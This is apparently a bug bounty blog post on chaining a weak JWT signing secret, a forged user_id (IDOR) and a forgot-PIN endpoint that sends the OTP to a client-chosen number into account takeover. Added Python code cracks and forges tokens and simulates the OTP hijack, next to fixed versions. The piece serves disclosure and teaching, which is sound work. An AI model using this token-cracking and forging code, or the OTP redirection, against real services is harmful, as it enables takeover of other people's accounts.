IDOR leads to Account Takeover with JWT Weak Secret

Tengku Arya Saputra
4 min read · Oct 19, 2023


Hello everyone, my name is Tengku Arya Saputra (follow me on LinkedIn). On this occasion I will tell you how I found a security hole of critical severity: initially I found an IDOR, but I escalated it further and got an account takeover vulnerability.

At first I registered an account and logged in to the application. I didn't initially think about analyzing the token and kept looking for other vulnerabilities. After two days I went back to analyze the system, and it turned out that the JWT token caught my interest: I wanted to try brute-forcing the secret to see whether it was a default one or not.

And here I can see that the JWT token is stored in a cookie, and the response shows the user's profile. If I manage to find the JWT secret I can do IDOR. How can I do it? I visited jwt.io to decode the token.

You can see that when it is decoded I get data in the form of JSON, which contains a user_id. If the secret is successfully cracked I can change the user_id to someone else's user_id.

You can see that the signature is invalid, and in the red box there is a secret field that I haven't filled in.

How can I find out the secret? I used the John the Ripper tool.

Initially I created a jwt file whose contents are the token that I had copied.

And bingo! I got what I was looking for: the secret that this app sets by default for signing its tokens. Let's continue!

I can see that the signature changed to valid, which means I succeeded and am free to change the user_id as I please...

Let's try to put the token into Burp Suite.

I changed the user_id from 1368129 to 1368128.

Before / After (screenshots of the request and response)

Bingo! I got the IDOR vulnerability via the JWT weak secret!
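The chain above (decode the token, brute-force the HS256 secret offline, change user_id, re-sign) written out as an added Python example. This is not code from the original post or from the affected application: the token, the weak secret "secret" and the wordlist are all constructed here for the demo, and the real application's secret is not shown on the page and not assumed. The dictionary loop is the same check John the Ripper performs over a wordlist; it is spelled out with the standard library so the signing and verification steps are visible.

```python
import base64
import hashlib
import hmac
import json
from typing import Dict, Iterable, Optional, Tuple


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWS requires."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the stripped padding."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: Dict, payload: Dict, secret: str) -> str:
    """Build a compact JWS over header.payload with HMAC-SHA256."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> Tuple[Dict, Dict]:
    """What jwt.io shows: header and payload are only base64url, not encrypted."""
    header_b64, payload_b64, _sig = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64))


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC under `secret` and compare in constant time."""
    signing_input, _, sig_b64 = token.rpartition(".")
    expected = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_secret(token: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack: the first candidate that validates the signature is the secret."""
    for candidate in wordlist:
        if verify_hs256(token, candidate):
            return candidate
    return None


def forge_token(token: str, secret: str, **claims) -> str:
    """Re-sign the token with modified claims, e.g. forge_token(t, s, user_id=1368128)."""
    header, payload = decode_unverified(token)
    payload.update(claims)
    return sign_hs256(header, payload, secret)


# --- constructed demo data (not from the real application) ---
WEAK_SECRET = "secret"  # assumption: a guessable default signing secret
ATTACKER_ID, VICTIM_ID = 1368129, 1368128  # the two user_ids quoted in the post
SAMPLE_TOKEN = sign_hs256({"alg": "HS256", "typ": "JWT"}, {"user_id": ATTACKER_ID}, WEAK_SECRET)
WORDLIST = ["password", "123456", "changeme", "secret", "jwt_secret"]  # constructed wordlist


def demo() -> Dict:
    """Run the full chain and return what each step produced."""
    found = crack_secret(SAMPLE_TOKEN, WORDLIST)
    if found is None:
        return {"secret": None, "forged": None}
    forged = forge_token(SAMPLE_TOKEN, found, user_id=VICTIM_ID)
    return {
        "secret": found,
        "forged": forged,
        "forged_payload": decode_unverified(forged)[1],
        "forged_valid": verify_hs256(forged, found),
    }


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The fix on the server side is the mirror image of crack_secret: a long random signing key (or an asymmetric algorithm with the private key kept off the web tier), plus an authorization check that does not trust user_id from the token alone for cross-account access.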

And how can I take over the account? Here I remembered that the application's login only uses a mobile number and PIN, so I can use the IDOR to obtain the victim's mobile number.

And I went straight to the login page.

I immediately entered the victim's cell phone number.

How can I find out the PIN? Here I had a problem with the PIN number, but I noticed an anomaly when I used "forgot PIN": I got a parameter that made me interested in changing it, see below.

change number

In the picture above I was suspicious of the parameter because logically the OTP code should be sent based on what the user enters in the username, but here the server exposes a field in the POST request that can be edited by anyone. So I tried to change the victim's number to mine.

And bingo! I got the OTP code: just change the cellphone number using the available parameter, and then I enter the OTP code into the account.

And it worked!!! I was directed to enter a new PIN! ...

I managed to get into the victim's account, completing the account takeover.
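The forgot-PIN flaw modelled as an added Python example, not code from the original post or from the application. The vulnerable handler takes the OTP destination from a request parameter, as the post describes; the hardened handler ignores anything the client sends and delivers only to the number the account already has on record. The account, phone numbers, PINs and the in-memory "SMS log" are constructed for the demo, and MAX_OTP_ATTEMPTS and the generic response are assumptions about what a fix should include.

```python
import hashlib
import secrets
from dataclasses import dataclass, field
from typing import Dict, List, Tuple

MAX_OTP_ATTEMPTS = 3  # assumption: burn the code after a few wrong guesses


def hash_pin(pin: str, salt: str) -> str:
    """Never store PINs in clear; salted PBKDF2 is enough for this toy."""
    return hashlib.pbkdf2_hmac("sha256", pin.encode(), salt.encode(), 50_000).hex()


@dataclass
class Account:
    user_id: int
    mobile: str  # number on record; it is also the login username
    pin_hash: str


@dataclass
class OtpService:
    accounts: Dict[str, Account]  # keyed by mobile number (the login username)
    sms_log: List[Tuple[str, str]] = field(default_factory=list)  # (destination, otp)
    pending: Dict[str, Tuple[str, int]] = field(default_factory=dict)  # username -> (otp, attempts left)

    def _issue_otp(self, username: str, destination: str) -> None:
        otp = f"{secrets.randbelow(10**6):06d}"
        self.pending[username] = (otp, MAX_OTP_ATTEMPTS)
        self.sms_log.append((destination, otp))  # stand-in for the SMS gateway

    def forgot_pin_vulnerable(self, request: Dict[str, str]) -> Dict[str, str]:
        """Bug: the OTP destination is read from the request body, not from the account."""
        account = self.accounts.get(request["username"])
        if account is None:
            return {"status": "unknown user"}
        self._issue_otp(request["username"], request["mobile"])
        return {"status": "otp sent", "to": request["mobile"]}

    def forgot_pin_fixed(self, request: Dict[str, str]) -> Dict[str, str]:
        """Fix: ignore any client-supplied number and send only to the number on record."""
        account = self.accounts.get(request["username"])
        if account is not None:
            self._issue_otp(request["username"], account.mobile)
        # Same response either way, so the endpoint does not confirm which numbers exist.
        return {"status": "if the account exists, a code was sent to the number on record"}

    def reset_pin(self, username: str, otp: str, new_pin: str) -> bool:
        """Consume the OTP; a wrong guess burns an attempt and the code dies after MAX_OTP_ATTEMPTS."""
        entry = self.pending.get(username)
        if entry is None:
            return False
        expected, attempts_left = entry
        if not secrets.compare_digest(expected, otp):
            attempts_left -= 1
            if attempts_left <= 0:
                del self.pending[username]
            else:
                self.pending[username] = (expected, attempts_left)
            return False
        del self.pending[username]
        account = self.accounts[username]
        account.pin_hash = hash_pin(new_pin, str(account.user_id))
        return True


# --- constructed scenario: numbers and PINs are made up for the demo ---
VICTIM_MOBILE = "+620000000001"
ATTACKER_MOBILE = "+620000000002"


def attacker_attempt(use_fixed_handler: bool) -> Tuple[bool, bool]:
    """Replay the post's attack; return (OTP reached the attacker, victim PIN was reset)."""
    svc = OtpService({VICTIM_MOBILE: Account(1368128, VICTIM_MOBILE, hash_pin("1234", "1368128"))})
    handler = svc.forgot_pin_fixed if use_fixed_handler else svc.forgot_pin_vulnerable
    # The attacker knows the victim's number (from the IDOR) and swaps in their own as destination.
    handler({"username": VICTIM_MOBILE, "mobile": ATTACKER_MOBILE})
    leaked = [otp for dest, otp in svc.sms_log if dest == ATTACKER_MOBILE]
    if not leaked:
        return False, False
    return True, svc.reset_pin(VICTIM_MOBILE, leaked[0], "9999")


if __name__ == "__main__":
    print("vulnerable handler:", attacker_attempt(False))
    print("fixed handler:     ", attacker_attempt(True))
```

The important line is the one argument to _issue_otp: the destination must be looked up from server-side state keyed by the account, never taken from the request. The attempt counter and the uniform response are secondary, but without them a six-digit code can be guessed online and the endpoint leaks which numbers are registered.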

Timeline

Report — October 15, 2023

Change To Triaged — October 17, 2023

Respond Team — October 18, 2023

Reward Bounty via Mobile Banking $$ — October 19, 2023

Resolved — October 19, 2023


Tengku Arya Saputra

Penetration Tester || Cyber Security Analyst || Cyber Security Enthusiast